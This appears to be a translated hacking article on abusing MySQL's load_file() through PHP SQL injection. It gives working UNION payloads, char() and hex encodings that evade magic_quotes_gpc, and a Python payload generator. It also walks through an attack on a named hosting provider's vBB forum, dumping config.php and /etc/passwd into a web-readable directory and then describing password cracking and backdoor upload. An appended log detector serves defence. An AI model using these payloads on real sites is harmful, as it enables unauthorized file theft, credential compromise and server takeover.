My previous article, "SQL Injection with MySQL", covered MySQL injection fairly comprehensively, but there is one dangerous function I deliberately left out of it. Used skilfully, it puts not just the PHP application but the security of the whole server at a heavy discount. Because "SQL Injection with MySQL" came out during the summer holidays, with many newcomers, students and less scrupulous readers around, I held this part back; in fact the present article was written in early May. Since that article, many people have turned to researching PHP/MySQL injection, more new techniques will be dug up, and the more advanced tricks we have worked out will be published in due course. The basics are not repeated here.
Details
We know that in a SQL statement we can call all sorts of MySQL built-in functions. The ones commonly used to gather system information are database(), user(), system_user(), session_user() and current_user(). There is one more worth attention: load_file(), which reads a file and returns its contents as a string.
Seeing this, you should already have an idea of what can be done: read confidential files. There are restrictions, though:
The file must be on the database server itself (load_file() runs on the server, not on the client).
The full path must be given.
The MySQL account must have the FILE privilege, and the file must be readable by the operating-system user mysqld runs as (readable by all, as the MySQL manual puts it).
The file must be smaller than max_allowed_packet bytes.
If the file does not exist, or cannot be read for any of the reasons above, the function returns NULL. Permissions are the real obstacle: under Windows with properly set NTFS permissions you will not be able to read the file you are after, and a file that only Administrators can access is out of reach when mysqld runs as an ordinary user. On current MySQL versions there is an additional restriction worth checking first: the secure_file_priv setting confines load_file() and INTO OUTFILE to a single directory, or disables them altogether when it is NULL. In a real injection there are two problems to solve:
The absolute physical path of the target file.
A working malformed statement that returns its contents.
Many PHP programs, when a query fails and display_errors = On, print an error message that leaks the absolute path of the web directory. Once the path is known, any injectable PHP program on the host becomes a serious threat to the whole server. Constructing the statement is the smaller problem.
Exploitation
Assume a program builds its SQL statement like this:
select * from article where articleid=$id
Note: conditions assumed here: magic_quotes_gpc = Off, and c:/boot.ini is readable.
We set $id to:
-1 union select 1,1,1,load_file('c:/boot.ini')
and the query becomes:
select * from article where articleid=-1 union select 1,1,1,load_file('c:/boot.ini')
The program will display the contents of c:/boot.ini (the number of 1s must match the column count of the original SELECT, which you establish first). Hosts with magic_quotes_gpc = Off are getting rare, however, so how do we build the statement without quotation marks? Anyone who has read "SQL Injection with MySQL" already knows: use the char() function, or write the string as a hexadecimal literal. That is all there is to it.
Note: conditions assumed here: magic_quotes_gpc = On, and c:/boot.ini is readable.
We set $id to:
-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
char(99,58,47,98,111,111,116,46,105,110,105) is "c:/boot.ini" written as ASCII codes, and the query becomes:
select * from article where articleid=-1 union select 1,1,1,load_file(char(99,58,47,98,111,111,116,46,105,110,105))
This reads boot.ini just as successfully. Equivalently, "c:/boot.ini" as a hexadecimal literal is 0x633A2F626F6F742E696E69, so the statement can also be written:
select * from article where articleid=-1 union select 1,1,1,load_file(0x633A2F626F6F742E696E69)
Short as it is, those who like it can type the following into phpMyAdmin or at the mysql> prompt and study it at leisure:
select load_file([string])
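The encoding step above, worked through as an added example (this is not code from the original article): it models what magic_quotes_gpc does to the quoted load_file() payload and builds the quote-free char() and hex forms from a path. The assumptions are mine: the target query is the article's select * from article where articleid=$id with four columns, so the UNION supplies four expressions, and magic quotes is modelled by a Python port of PHP's addslashes().

```python
"""
Added example, not from the original article: shows why the quoted
load_file() payload breaks under magic_quotes_gpc=On and how the
char()/hex forms avoid the problem.

Assumptions (mine, not the article's): the vulnerable statement is
    select * from article where articleid=$id
with four columns, and magic quotes is modelled by a port of PHP's
addslashes().
"""
import re

QUERY_TEMPLATE = "select * from article where articleid={id}"


def addslashes(s: str) -> str:
    """Python port of PHP addslashes(): what magic_quotes_gpc=On does to GET/POST/cookie data."""
    s = re.sub(r"(['\"\\])", r"\\\1", s)   # backslash-escape ' " and \
    return s.replace("\0", "\\0")          # NUL becomes \0


def to_char_expr(path: str) -> str:
    """'c:/boot.ini' -> 'char(99,58,...)': the string as a list of ASCII codes."""
    return "char(" + ",".join(str(ord(c)) for c in path) + ")"


def to_hex_literal(path: str) -> str:
    """'c:/boot.ini' -> '0x633A2F...': the string as a MySQL hexadecimal literal."""
    return "0x" + path.encode("latin-1").hex().upper()


def load_file_payload(path: str, ncols: int, encoding: str) -> str:
    """Value to submit as $id. encoding is 'quoted', 'char' or 'hex'."""
    if encoding == "quoted":
        arg = "'" + path + "'"
    elif encoding == "char":
        arg = to_char_expr(path)
    elif encoding == "hex":
        arg = to_hex_literal(path)
    else:
        raise ValueError("unknown encoding: " + encoding)
    filler = ",".join(["1"] * (ncols - 1))   # pad the UNION to the column count
    return "-1 union select %s,load_file(%s)" % (filler, arg)


def query_seen_by_mysql(path: str, ncols: int, encoding: str, magic_quotes: bool) -> str:
    """The statement MySQL receives after PHP has (or has not) escaped $id."""
    value = load_file_payload(path, ncols, encoding)
    if magic_quotes:
        value = addslashes(value)
    return QUERY_TEMPLATE.format(id=value)


def survives_magic_quotes(path: str, ncols: int, encoding: str) -> bool:
    """True when magic quotes leaves the payload untouched (it contains no quote or backslash)."""
    return (query_seen_by_mysql(path, ncols, encoding, True)
            == query_seen_by_mysql(path, ncols, encoding, False))


if __name__ == "__main__":
    for enc in ("quoted", "char", "hex"):
        print(enc, "survives magic quotes:", survives_magic_quotes("c:/boot.ini", 4, enc))
        print("   ", query_seen_by_mysql("c:/boot.ini", 4, enc, magic_quotes=True))
```

With magic quotes on, the quoted form reaches MySQL as load_file(\'c:/boot.ini\'), a syntax error, while the char() and hex forms contain nothing for addslashes() to escape and arrive unchanged.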
Of course, in real situations the file contents are often not displayed, for one reason or another; in that case we can write them out to a file with INTO OUTFILE instead. Everyone knows how that is used, so I will not go into detail; the example below explains everything.
Example
www.***host.cn is a well-known FreeBSD hosting provider in China, and I used it as the test target. Because it runs the vBB forum, I did not have to go looking for the calendar.php vulnerability (which is everywhere anyway). This was purely a security test: I only gathered information and did not enter the server.
First, some extra explanation of a piece of code in vBB's global.php:
    // get rid of slashes in get / post / cookie data
    function stripslashesarray(&$arr) {
        while (list($key, $val) = each($arr)) {
            if ($key != "templatesused" and $key != "argc" and $key != "argv") {
                // string values under request keys (not upper-case environment names) are unescaped
                if (is_string($val) and (strtoupper($key) != $key or ("".intval($key) == "$key"))) {
                    $arr["$key"] = stripslashes($val);
                // nested arrays such as HTTP_POST_VARS / HTTP_GET_VARS are processed recursively
                } else if (is_array($val) and ($key == 'HTTP_POST_VARS' or $key == 'HTTP_GET_VARS' or strtoupper($key) != $key)) {
                    $arr["$key"] = stripslashesarray($val);
                }
            }
        }
        return $arr;
    }

    if (get_magic_quotes_gpc() and is_array($GLOBALS)) {
        if (isset($attachment)) {
            $GLOBALS['attachment'] = addslashes($GLOBALS['attachment']);
        }
        if (isset($avatarfile)) {
            $GLOBALS['avatarfile'] = addslashes($GLOBALS['avatarfile']);
        }
        $GLOBALS = stripslashesarray($GLOBALS);
    }
    set_magic_quotes_runtime(0);
What this code does: if magic_quotes_gpc is on, it strips the escaping backslashes from every special character in the GET/POST/cookie data. So whatever magic_quotes_gpc is set to in php.ini, the single quotes we submit arrive at the query unescaped, and injection works. Ha ha.
As we know, submitting:
calendar.php?action=edit&eventid=1 union select 1,1,1,1,1,username,password from user where userid=1
should return the username and the MD5 hash of the password. For particular reasons nothing was displayed here, but from experience I knew the server had not been hardened, so we can read files and write them out instead.
Because I had earlier stumbled on a file that calls phpinfo(), I knew the absolute path of the web root. Browsing the site, I found a download system that generates HTML files; if its directory were not writable it could not generate them. None of that is the focus of this article; what matters is that we now hold the following information:
Web root absolute path: /home/4ngel
Writable directory: /home/4ngel/soft/
magic_quotes_gpc = On
Compared with root on the host, the forum is nothing, and I had no interest in the forum admin account. We want to read the forum configuration file and /etc/passwd. With the MySQL connection details we can start from there and write a webshell or something else; with /etc/passwd we can crack the passwords and go straight in over SSH.
The vBB configuration file is /home/4ngel/forum/admin/config.php. Convert the path to ASCII codes and submit:
calendar.php?action=edit&eventid=1 union select 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) from user where userid=1 into outfile '/home/4ngel/soft/cfg.txt'
Remember to add a WHERE condition; otherwise, on a forum with many users, the row set (and so the exported file) becomes large. Or simply give eventid a value that does not exist and drop the WHERE, like this (UNION discards duplicate rows, so the identical rows selected from user collapse into a single copy of the file):
calendar.php?action=edit&eventid=-1 union select 1,1,1,1,1,load_file(char(47,104,111,109,101,47,52,110,103,101,108,47,102,111,114,117,109,47,97,100,109,105,110,47,99,111,110,102,105,103,46,112,104,112)) from user into outfile '/home/4ngel/soft/cfg.txt'
/etc/passwd converted to ASCII codes; submit:
calendar.php?action=edit&eventid=-1 union select 1,1,1,1,1,load_file(char(47,101,116,99,47,112,97,115,115,119,100)) from user into outfile '/home/4ngel/soft/etcpwd.txt'
Note that the top of the forum page then shows this error:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/4ngel/forum/admin/db_mysql.php on line 154
Experience says this means the file was written successfully: a SELECT ... INTO OUTFILE produces no result set, so the page has nothing to fetch. Request:
http://www.xxxhost.cn/soft/cfg.txt
http://www.xxxhost.cn/soft/etcpwd.txt
and the contents are there. After that it is the usual routine: crack the passwords one by one, a bit of deception, log in to the admin backend, upload a backdoor, read config.php, and so on. All of it came from one load_file(). Is it harmful or not?
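The defender's side of the technique described in this article, as an added example (not code from the original article or from vBB): a small detector for load_file() and INTO OUTFILE in web-server access logs, which also decodes char(...) and 0x... literals so the analyst sees the file path that was targeted rather than a list of numbers. Everything here is an assumption of mine: the log lines are constructed for the example, and the patterns cover the forms used in this article, not every possible obfuscation.

```python
"""
Added example, not from the original article: detect the load_file()/INTO
OUTFILE requests shown above in constructed access-log lines (combined log
format) and decode the char(...), 0x... and '...' literals in them.

Assumptions (mine): the sample log is made up; the regexes cover the forms
used in this article, not every obfuscation an attacker might use.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample log: two ordinary requests and two using the article's technique.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2004:10:01:02 +0800] "GET /calendar.php?action=edit&eventid=1 HTTP/1.1" 200 5123
10.0.0.7 - - [12/May/2004:10:01:09 +0800] "GET /calendar.php?action=edit&eventid=-1%20union%20select%201,1,1,1,1,load_file(char(47,101,116,99,47,112,97,115,115,119,100))%20from%20user%20into%20outfile%20'/home/4ngel/soft/etcpwd.txt' HTTP/1.1" 200 812
10.0.0.7 - - [12/May/2004:10:02:30 +0800] "GET /article.php?id=-1%20UNION%20SELECT%201,1,1,LOAD_FILE(0x633A2F626F6F742E696E69) HTTP/1.1" 200 2210
10.0.0.9 - - [12/May/2004:10:03:00 +0800] "GET /article.php?id=42 HTTP/1.1" 200 3001
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SUSPICIOUS_RE = re.compile(r"\b(load_file|into\s+outfile)\b", re.I)
CHAR_RE = re.compile(r"\bchar\s*\(\s*([\d\s,]+)\)", re.I)
HEX_RE = re.compile(r"\b0x([0-9a-f]+)\b", re.I)
QUOTED_RE = re.compile(r"'([^']*)'")


def decode_literals(sql: str) -> list:
    """Recover strings written as char(...), 0x... or '...' in an injected query."""
    found = []
    for m in CHAR_RE.finditer(sql):
        codes = [int(n) for n in m.group(1).replace(" ", "").split(",") if n]
        found.append(bytes(codes).decode("latin-1"))
    for m in HEX_RE.finditer(sql):
        digits = m.group(1)
        if len(digits) % 2 == 0:          # odd-length hex cannot be a string literal
            found.append(bytes.fromhex(digits).decode("latin-1"))
    found.extend(QUOTED_RE.findall(sql))
    return found


def scan_log(text: str) -> list:
    """One finding per request whose URL contains load_file() or INTO OUTFILE."""
    findings = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = unquote_plus(m.group(1))    # undo %20 etc. before pattern matching
        hits = SUSPICIOUS_RE.findall(url)
        if not hits:
            continue
        findings.append({
            "client": line.split()[0],
            "url": url,
            "functions": sorted({re.sub(r"\s+", " ", h.lower()) for h in hits}),
            "paths": decode_literals(url),
        })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client"], f["functions"], f["paths"])
```

Run against the sample, the second and third lines are flagged and the decoded paths come out as /etc/passwd with the outfile destination /home/4ngel/soft/etcpwd.txt, and c:/boot.ini. The same decoding applies to MySQL's general query log if that is what you have instead of web-server logs.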